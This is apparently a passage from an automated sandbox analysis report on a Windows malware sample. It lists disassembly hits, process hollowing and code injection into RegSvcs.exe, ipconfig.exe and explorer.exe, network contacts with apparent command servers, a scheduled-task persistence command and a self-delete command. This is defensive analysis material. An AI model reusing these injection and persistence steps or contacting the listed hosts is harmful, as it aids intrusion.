Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189FE3F mov eax, dword ptr fs:[00000030h] 6_2_0189FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAE44 mov eax, dword ptr fs:[00000030h] 6_2_018AAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAE44 mov eax, dword ptr fs:[00000030h] 6_2_018AAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AE73 mov eax, dword ptr fs:[00000030h] 6_2_0180AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B8B58 mov eax, dword ptr fs:[00000030h] 9_2_034B8B58
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03413B7A mov eax, dword ptr fs:[00000030h] 9_2_03413B7A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03413B7A mov eax, dword ptr fs:[00000030h] 9_2_03413B7A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 mov eax, dword ptr fs:[00000030h] 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A131B mov eax, dword ptr fs:[00000030h] 9_2_034A131B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EDB60 mov ecx, dword ptr fs:[00000030h] 9_2_033EDB60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EF358 mov eax, dword ptr fs:[00000030h] 9_2_033EF358
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EDB40 mov eax, dword ptr fs:[00000030h] 9_2_033EDB40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034153C5 mov eax, dword ptr fs:[00000030h] 9_2_034153C5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034653CA mov eax, dword ptr fs:[00000030h] 9_2_034653CA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034653CA mov eax, dword ptr fs:[00000030h] 9_2_034653CA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034103E2 mov eax, dword ptr fs:[00000030h] 9_2_034103E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340DBE9 mov eax, dword ptr fs:[00000030h] 9_2_0340DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034923E3 mov ecx, dword ptr fs:[00000030h] 9_2_034923E3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034923E3 mov ecx, dword ptr fs:[00000030h] 9_2_034923E3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034923E3 mov eax, dword ptr fs:[00000030h] 9_2_034923E3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033F1B8F mov eax, dword ptr fs:[00000030h] 9_2_033F1B8F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033F1B8F mov eax, dword ptr fs:[00000030h] 9_2_033F1B8F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A138A mov eax, dword ptr fs:[00000030h] 9_2_034A138A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0349D380 mov ecx, dword ptr fs:[00000030h] 9_2_0349D380
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341138B mov eax, dword ptr fs:[00000030h] 9_2_0341138B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341138B mov eax, dword ptr fs:[00000030h] 9_2_0341138B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341138B mov eax, dword ptr fs:[00000030h] 9_2_0341138B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341B390 mov eax, dword ptr fs:[00000030h] 9_2_0341B390
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03412397 mov eax, dword ptr fs:[00000030h] 9_2_03412397
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340EB9A mov eax, dword ptr fs:[00000030h] 9_2_0340EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340EB9A mov eax, dword ptr fs:[00000030h] 9_2_0340EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03414BAD mov eax, dword ptr fs:[00000030h] 9_2_03414BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03414BAD mov eax, dword ptr fs:[00000030h] 9_2_03414BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03414BAD mov eax, dword ptr fs:[00000030h] 9_2_03414BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B5BA5 mov eax, dword ptr fs:[00000030h] 9_2_034B5BA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03474257 mov eax, dword ptr fs:[00000030h] 9_2_03474257
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AEA55 mov eax, dword ptr fs:[00000030h] 9_2_034AEA55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EAA16 mov eax, dword ptr fs:[00000030h] 9_2_033EAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EAA16 mov eax, dword ptr fs:[00000030h] 9_2_033EAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0349B260 mov eax, dword ptr fs:[00000030h] 9_2_0349B260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0349B260 mov eax, dword ptr fs:[00000030h] 9_2_0349B260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B8A62 mov eax, dword ptr fs:[00000030h] 9_2_034B8A62
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov eax, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov ecx, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov eax, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E5210 mov eax, dword ptr fs:[00000030h] 9_2_033E5210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033F8A0A mov eax, dword ptr fs:[00000030h] 9_2_033F8A0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0342927A mov eax, dword ptr fs:[00000030h] 9_2_0342927A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03403A1C mov eax, dword ptr fs:[00000030h] 9_2_03403A1C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AAA16 mov eax, dword ptr fs:[00000030h] 9_2_034AAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AAA16 mov eax, dword ptr fs:[00000030h] 9_2_034AAA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A229 mov eax, dword ptr fs:[00000030h] 9_2_0340A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03424A2C mov eax, dword ptr fs:[00000030h] 9_2_03424A2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03424A2C mov eax, dword ptr fs:[00000030h] 9_2_03424A2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 mov eax, dword ptr fs:[00000030h] 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E9240 mov eax, dword ptr fs:[00000030h] 9_2_033E9240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03412ACB mov eax, dword ptr fs:[00000030h] 9_2_03412ACB
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033FAAB0 mov eax, dword ptr fs:[00000030h] 9_2_033FAAB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033FAAB0 mov eax, dword ptr fs:[00000030h] 9_2_033FAAB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E52A5 mov eax, dword ptr fs:[00000030h] 9_2_033E52A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03412AE4 mov eax, dword ptr fs:[00000030h] 9_2_03412AE4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF mov eax, dword ptr fs:[00000030h] 9_2_034A4AEF
Enables debug privileges
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 154.203.184.76 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.realsults.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.14 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.wfiboostrs.com
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 8B0000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FE3008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VVhTSSmjNa' /XML 'C:\Users\user\AppData\Local\Temp\tmp27F.tmp' Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: explorer.exe, 00000007.00000002.911506463.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000007.00000002.912007261.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.680516235.0000000005E50000.00000004.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.912007261.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.912007261.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.685038771.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
